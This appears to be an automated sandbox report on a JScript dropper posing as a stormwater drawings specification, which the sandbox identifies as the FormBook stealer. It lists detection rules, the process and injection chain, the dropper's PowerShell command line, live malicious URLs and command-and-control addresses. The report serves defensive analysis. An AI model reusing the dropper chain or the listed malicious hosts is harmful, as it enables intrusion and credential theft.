Edit tour

Windows Analysis Report
Stormwater Works Drawings Spec.js

Overview

General Information

Sample name:	Stormwater Works Drawings Spec.js
Analysis ID:	1623349
MD5:	ea7b7236f0f1492741e129ffc3862f5f
SHA1:	99ef8587542810491e92acce623ffa2f61ea28c6
SHA256:	7a86d3036e570c8db66e3a885075739fd6a3c890b1d37ee7a66a9655b640be3a
Tags:	jsuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

.NET source code contains potential unpacker

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

JavaScript source code contains functionality to generate code involving a shell, file or stream

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Powershell drops PE file

Queues an APC in another process (thread injection)

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: AspNetCompiler Execution

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6920 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 6304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

JXCJKXCJHKJHXCJHKXCXCJHK.exe (PID: 1072 cmdline: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" MD5: 81AD8AA4D4325CF57F364B0604DCCF09)

aspnet_compiler.exe (PID: 2596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

xBjKgBCuI1jq.exe (PID: 5012 cmdline: "C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\lb5QVUC8Y.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

runonce.exe (PID: 6304 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)

xBjKgBCuI1jq.exe (PID: 2692 cmdline: "C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\iKbsHfBqN.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 7124 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2975519178.00000000042C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2212915284.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2974122884.0000000002600000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2975394799.0000000002940000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2975585559.0000000004310000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.2975527650.0000000003570000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2217495881.0000000001290000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2217981667.0000000001D50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: powershell.exe PID: 6304	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xf396d:$b1: ::WriteAllBytes( 0xf39b4:$b2: ::FromBase64String( 0x44759:$s1: -join 0x519da:$s1: -join 0x54e9c:$s1: -join 0x55536:$s1: -join 0x57032:$s1: -join 0x59294:$s1: -join 0x59abb:$s1: -join 0x5a32c:$s1: -join 0x5aa67:$s1: -join 0x5aa99:$s1: -join 0x5aae1:$s1: -join 0x5ab00:$s1: -join 0x5b351:$s1: -join 0x5b4cd:$s1: -join 0x5b545:$s1: -join 0x5b5d8:$s1: -join 0x5b83e:$s1: -join 0x5da02:$s1: -join 0x6c466:$s1: -join
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\runonce.exe, SourceProcessId: 6304, StartAddress: 262CEBE, TargetImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, TargetProcessId: 6304

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6920, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", CommandLine|base64offset|contains: Z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", ProcessId: 6920, ProcessName: wscript.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe, ParentProcessId: 1072, ParentProcessName: JXCJKXCJHKJHXCJHKXCXCJHK.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 2596, ProcessName: aspnet_compiler.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6920, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", CommandLine|base64offset|contains: Z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", ProcessId: 6920, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6920, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1", ProcessId: 6304, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Windows executable base64 encoded

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T07:26:10.990974+0100	2018856	1	A Network Trojan was detected	108.181.20.35	443	192.168.2.4	49731	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T07:27:15.033315+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49798	162.218.30.235	80	TCP
2025-02-25T07:27:38.794800+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49951	103.106.67.112	80	TCP
2025-02-25T07:27:52.211817+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50012	104.21.32.1	80	TCP
2025-02-25T07:28:05.654652+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50016	104.21.48.1	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T07:27:31.141297+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49899	103.106.67.112	80	TCP
2025-02-25T07:27:33.700914+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49919	103.106.67.112	80	TCP
2025-02-25T07:27:36.316829+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49935	103.106.67.112	80	TCP
2025-02-25T07:27:44.573122+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49987	104.21.32.1	80	TCP
2025-02-25T07:27:47.907078+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50007	104.21.32.1	80	TCP
2025-02-25T07:27:50.469349+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50011	104.21.32.1	80	TCP
2025-02-25T07:27:58.101717+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50013	104.21.48.1	80	TCP
2025-02-25T07:28:00.495470+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50014	104.21.48.1	80	TCP
2025-02-25T07:28:03.097961+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50015	104.21.48.1	80	TCP
2025-02-25T07:28:11.983431+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50017	134.122.135.48	80	TCP
2025-02-25T07:28:14.560558+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50018	134.122.135.48	80	TCP
2025-02-25T07:28:17.124089+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50019	134.122.135.48	80	TCP

ETPRO MALWARE Likely Dropper Doc GET to .moe TLD

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-25T07:26:10.902493+0100	2827578	1	A Network Trojan was detected	192.168.2.4	49731	108.181.20.35	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.tumbetgirislinki.fit/k566/?CL=RARW43WNMKajmHobqktuR6SSs++r69WXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe/M4SnSZZuBmldonFkNjvznFjfMe0yaUlTKw=&Cf=xxUlW2vX-dIPmnP0	Avira URL Cloud: Label: phishing
Source: https://www.seasay.xyz/c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4	Avira URL Cloud: Label: malware
Source: http://www.seasay.xyz/c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4+2MinMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7RzM6wNjAHWVIo4recboKbaao8YnR4NtOnxQ=&Cf=xxUlW2vX-dIPmnP0	Avira URL Cloud: Label: malware
Source: http://www.l63339.xyz/vhr7/?Cf=xxUlW2vX-dIPmnP0&CL=iaSfD1StI7hDT4qLPsiE2zQeJuTNjk7n7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4t0mW0LdNsZ/ysFr93T3fDTPWMGFwNTiC4gY=	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for submitted file

Source: Stormwater Works Drawings Spec.js

Virustotal: Detection: 13%

Perma Link

Yara detected FormBook

Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2975519178.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2212915284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2974122884.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2975394799.0000000002940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2975585559.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2975527650.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2217495881.0000000001290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2217981667.0000000001D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: unknown

HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: runonce.pdbGCTL source: aspnet_compiler.exe, 00000004.00000002.2213460510.0000000000958000.00000004.00000020.00020000.00000000.sdmp, xBjKgBCuI1jq.exe, 00000008.00000002.2974936676.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000004.00000002.2213941533.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000003.2213305486.00000000041C1000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.0000000004530000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000003.2215237417.000000000437B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.2213941533.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 00000009.00000003.2213305486.00000000041C1000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.00000000046CE000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000002.2975775287.0000000004530000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 00000009.00000003.2215237417.000000000437B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\VZBXV4444.pdb source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr
Source:	Binary string: runonce.pdb source: aspnet_compiler.exe, 00000004.00000002.2213460510.0000000000958000.00000004.00000020.00020000.00000000.sdmp, xBjKgBCuI1jq.exe, 00000008.00000002.2974936676.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\VZBXV4444.pdbBSJB source: powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xBjKgBCuI1jq.exe, 00000008.00000000.2132371221.000000000021F000.00000002.00000001.01000000.0000000A.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000000.2281413073.000000000021F000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Windows\SysWOW64\runonce.exe

Code function: 9_2_0261C8D0 FindFirstFileW,FindNextFileW,FindClose,

9_2_0261C8D0

Software Vulnerabilities

JavaScript source code contains functionality to generate code involving a shell, file or stream

Source: Stormwater Works Drawings Spec.js	Return value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,']	Go to definition
Source: Stormwater Works Drawings Spec.js	Return value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,']	Go to definition
Source: Stormwater Works Drawings Spec.js	Return value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"']	Go to definition
Source: Stormwater Works Drawings Spec.js	Return value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']	Go to definition
Source: Stormwater Works Drawings Spec.js	Return value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']	Go to definition
Source: Stormwater Works Drawings Spec.js	Return value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']	Go to definition
Source: Stormwater Works Drawings Spec.js	Argument value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\downloaded_script.ps1"",0,true', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']	Go to definition
Source: Stormwater Works Drawings Spec.js	Return value : ['6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\downloaded_script.ps1"",0,true', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']	Go to definition
Source: Stormwater Works Drawings Spec.js	Return value : ['"WScript.Shell"', '6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\downloaded_script.ps1"",0,true', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']	Go to definition
Source: Stormwater Works Drawings Spec.js	Return value : ['"WScript.Shell"', '6661216fuMSGJ,4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\downloaded_script.ps1"",0,true', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '4098180dQOoYH,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,280198hWAMOx,GET,3890340cHs']	Go to definition

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\SysWOW64\runonce.exe	Code function: 4x nop then xor eax, eax	9_2_02609EF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 4x nop then mov ebx, 00000004h	9_2_044104E8
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Code function: 4x nop then pop edi	10_2_0297AA1A
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Code function: 4x nop then xor eax, eax	10_2_02980217
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Code function: 4x nop then pop edi	10_2_0297CA09
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Code function: 4x nop then pop edi	10_2_0298B8B0
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Code function: 4x nop then pop edi	10_2_0298B8FD
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Code function: 4x nop then pop edi	10_2_0298B818
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Code function: 4x nop then pop edi	10_2_0298B98E
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Code function: 4x nop then pop edi	10_2_0298B7D4

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49798 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49919 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49899 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49951 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49935 -> 103.106.67.112:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50007 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50016 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49987 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50012 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 134.122.135.48:80
Source: Network traffic	Suricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49731 -> 108.181.20.35:443
